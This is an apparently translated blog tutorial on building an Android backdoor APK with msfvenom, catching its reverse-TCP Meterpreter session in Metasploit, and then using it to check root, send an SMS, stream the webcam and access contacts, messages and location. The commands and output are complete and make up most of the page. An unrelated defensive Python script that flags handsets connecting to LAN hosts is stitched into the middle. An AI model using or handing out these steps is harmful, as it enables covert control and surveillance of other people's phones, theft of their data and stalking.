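Kali: Generating an APK Backdoor with Metasploit to Control Android

深圳湾 (Shenzhen Bay) 2018-02-08

A beginner's tutorial; experts, please go easy.

When running the experiment, change the IP addresses to those of your own environment.

Generating the APK backdoor

Kali Linux (attacker): 192.168.169.76

Android (target): 192.168.169.137

Boot Kali, open a terminal, and generate the APK backdoor. The APK is only 9.2k, which is pretty impressive.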

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes

lhost is the Kali machine's IP; lport specifies a port.

Start the Metasploit console and listen

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #set the payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #Kali's IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #matches the port set earlier
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

Copy the APK out, install it on the phone and open it; after that you can run exploit, and you will see the session connect back.
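A defender-side check for the connection shown in the handler output above, as an added example that is not part of the original post: it scans firewall-style connection logs for a handset opening TCP sessions to another host on the same LAN. The log format, the `LAN`, `HANDSETS` and `ALLOWED` values and the function name are assumptions, and it assumes the log point (for example the Wi-Fi gateway) sees handset traffic; the sample lines are constructed and reuse this page's lab addresses.

```python
import ipaddress
import re

# Assumptions for this sketch: the lab subnet, the handset inventory, and the
# allowlist of internal (host, port) services handsets may legitimately reach.
LAN = ipaddress.ip_network("192.168.169.0/24")
HANDSETS = {"192.168.169.137"}
ALLOWED = {("192.168.169.1", 80)}

# Constructed sample in an iptables-LOG-like key=value format.
SAMPLE_LOG = """\
Sep 28 01:35:40 gw kernel: NEW SRC=192.168.169.137 DST=192.168.169.1 PROTO=UDP SPT=40112 DPT=53
Sep 28 01:35:58 gw kernel: NEW SRC=192.168.169.137 DST=203.0.113.10 PROTO=TCP SPT=45550 DPT=443
Sep 28 01:36:01 gw kernel: NEW SRC=192.168.169.137 DST=192.168.169.76 PROTO=TCP SPT=45552 DPT=445
Sep 28 01:36:09 gw kernel: NEW SRC=192.168.169.50 DST=192.168.169.76 PROTO=TCP SPT=51000 DPT=445
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def suspicious_handset_flows(log_text, handsets=HANDSETS, allowed=ALLOWED):
    """Return (src, dst, dport) for handset-initiated TCP to LAN hosts not allowlisted."""
    hits = []
    for line in log_text.splitlines():
        f = dict(FIELD.findall(line))
        # Only TCP sessions opened by a known handset are of interest here.
        if f.get("PROTO") != "TCP" or f.get("SRC") not in handsets:
            continue
        try:
            dst = ipaddress.ip_address(f["DST"])
            dport = int(f["DPT"])
        except (KeyError, ValueError):
            continue  # malformed record, skip rather than crash
        # A phone dialing a peer on its own LAN (here: TCP 445 on a workstation)
        # is unusual; normal handset traffic goes to the gateway or the internet.
        if dst in LAN and (str(dst), dport) not in allowed:
            hits.append((f["SRC"], str(dst), dport))
    return hits


if __name__ == "__main__":
    for src, dst, dport in suspicious_handset_flows(SAMPLE_LOG):
        print(f"ALERT handset {src} opened TCP to LAN host {dst}:{dport}")
```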

You can look at the help to see what operations are available.

meterpreter > help

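Feature examples

Reading contacts and messages, taking photos, recording audio, getting location information, uploading and downloading files, and so on; it is quite powerful.

#System information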
meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android

#Check root status
meterpreter > check_root 
[+] Device is rooted

#Send an SMS
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d  <opt>  Destination number
    -dr        Wait for delivery report
    -h         Help Banner
    -t  <opt>  SMS body text


meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#Web video chat (my phone had no suitable browser, so it did not open)
meterpreter > webcam_chat 
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine


#Webcam video stream in a web page, showing the live picture
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...

Supplementary articles on FreeBuf:

How to obtain WeChat chat records on Android and iOS; controlling Android through Metasploit